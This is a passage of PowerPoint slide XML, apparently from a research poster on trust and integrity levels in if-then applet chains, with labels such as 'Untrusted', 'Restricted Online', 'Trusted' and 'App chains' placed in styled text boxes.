            <a:ext cx="0" cy="1748118"/>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15D6D5B-2596-4137-A2F3-16ED4B408DB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="70" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2577355" y="13411198"/>
            <a:ext cx="0" cy="2232214"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="0C234B"/>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18A948C-3BDC-4ACD-9F25-AB14300D368E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="215153" y="11914093"/>
            <a:ext cx="3227294" cy="477054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This applet uses </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="Rectangle 134">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{983B8D5D-8587-46E0-9762-4AE7DCD8EBE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3987246" y="10310368"/>
            <a:ext cx="60785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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw dist="38100" dir="2640000" algn="bl" rotWithShape="0">
                    <a:schemeClr val="accent1"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="TextBox 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AD3D5D9-D32C-4D4E-A81C-02B58A7C2FA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="24745551" y="3279124"/>
            <a:ext cx="1355321" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d>
            <a:bevelT prst="angle"/>
            <a:bevelB w="139700" h="139700" prst="divot"/>
          </a:sp3d>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if</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="TextBox 111">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E88181B2-60AA-4006-B001-D84FEF0C12C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26321401" y="3256928"/>
            <a:ext cx="1540905" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d>
            <a:bevelT prst="angle"/>
            <a:bevelB w="139700" h="139700" prst="divot"/>
          </a:sp3d>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"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then</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="TextBox 111">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B6E34CB-C90B-4D7F-9282-4E800E177B03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="28302601" y="4081678"/>
            <a:ext cx="1442294" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d>
            <a:bevelT prst="angle"/>
            <a:bevelB w="139700" h="139700" prst="divot"/>
          </a:sp3d>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"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then</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147" name="TextBox 111">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{522F1FBD-6326-4D00-A4D8-D97D5E17410B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="30131397" y="4996080"/>
            <a:ext cx="1496085" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d>
            <a:bevelT prst="angle"/>
            <a:bevelB w="139700" h="139700" prst="divot"/>
          </a:sp3d>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"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then</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="TextBox 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{506DBBFF-F26E-4A50-8935-9DCAC4721BFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26699858" y="4076978"/>
            <a:ext cx="597672" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d>
            <a:bevelT prst="angle"/>
            <a:bevelB w="139700" h="139700" prst="divot"/>
          </a:sp3d>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if</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="TextBox 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4BF1457-F5A5-4E32-93C5-D892E2D74B05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="28492794" y="4982409"/>
            <a:ext cx="1355321" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d>
            <a:bevelT prst="angle"/>
            <a:bevelB w="139700" h="139700" prst="divot"/>
          </a:sp3d>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if</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Rounded Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F061CB99-5CFE-4A3B-8C26-4CCAC117741B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="24715694" y="1613651"/>
            <a:ext cx="7826187" cy="649224"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D16D63"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d>
            <a:bevelT prst="angle"/>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C234B"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Solutions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="153" name="Picture 152" descr="A close up of a logo&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02E89857-3BEA-43D0-8BE4-140FF09E7C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4616" y="3942918"/>
            <a:ext cx="1259830" cy="1259830"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="154" name="Picture 153" descr="A close up of a logo&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{610AA15A-F651-41B8-A531-A913CAD964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26329" y="4801721"/>
            <a:ext cx="1059646" cy="1059646"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="TextBox 138">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1054E404-A85E-4367-ADA4-A4A98A1E0F60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="30471034" y="3039035"/>
            <a:ext cx="1452283" cy="45719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4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0C234B"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" panose="02050604050505020204" pitchFamily="18"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latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>App chains</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="TextBox 150">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3828DEC-9E15-4610-88A2-26FA282F3B03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26867219" y="7230929"/>
            <a:ext cx="1344705" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Untrusted</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="TextBox 157">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB5E8C11-790B-4C66-B05D-037021E2B480}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26481738" y="7978591"/>
            <a:ext cx="1891552" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Untrusted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>group</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159" name="TextBox 158">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E030FFD1-42D5-496A-B209-C855FA5478D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="27647150" y="9421909"/>
            <a:ext cx="1586751" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Restricted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Online </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="TextBox 159">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5A88D26-9D67-4053-9727-81803D478294}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25867658" y="9412946"/>
            <a:ext cx="1344705" cy="615553"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Restricted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Physical</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163" name="TextBox 162">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68C034A3-5BE2-4163-AB90-EA9004E7DC18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="27006172" y="10865191"/>
            <a:ext cx="1192308" cy="615553"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Trusted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Other</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164" name="TextBox 163">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DF7E4B6-F3E7-4413-80CF-56CB82EE2D51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="27037551" y="12192000"/>
            <a:ext cx="1147483" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1600">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trusted</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="Rounded Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4344663C-DE28-46A3-841E-456692F6983F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="24829477" y="14325599"/>
            <a:ext cx="7827264" cy="649224"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D16D63"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d>
            <a:bevelT prst="angle"/>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0C234B"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>References</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="157" name="Straight Arrow Connector 156">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC305507-72CC-4EBA-99B6-3C7CD9B3EF6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="166" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25679399" y="7063383"/>
            <a:ext cx="0" cy="4626108"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="762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B80A7CC0-741F-474D-8A3F-21D85D5F7C1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="24760515" y="6355497"/>
            <a:ext cx="1837767" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square"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More Restrictions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="TextBox 166">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DAC7365-F35C-47B1-A31D-D743E3ADB36F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="24778443" y="11756610"/>
            <a:ext cx="1900521" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square"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Few Restrictions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168" name="TextBox 167">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C194375E-D22D-4729-9921-089FEA228EDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="27674045" y="5905564"/>
            <a:ext cx="1364333" cy="34695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Integrity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="169" name="Straight Arrow Connector 168">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{630333DA-F94C-41F3-900D-75E44956C642}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="29782468" y="9431836"/>
            <a:ext cx="15753" cy="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E1B70677-5022-4F67-A553-8C1BFCEB388E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="30228987" y="7288312"/>
            <a:ext cx="1362635" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Private</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="TextBox 170">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E11CB88F-A465-4C89-9E84-A8BD3F52F3B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="31170282" y="8525437"/>
            <a:ext cx="1398494" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Restricted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Online </a:t>
            </a:r>
          </a:p>
        </p:txBody>
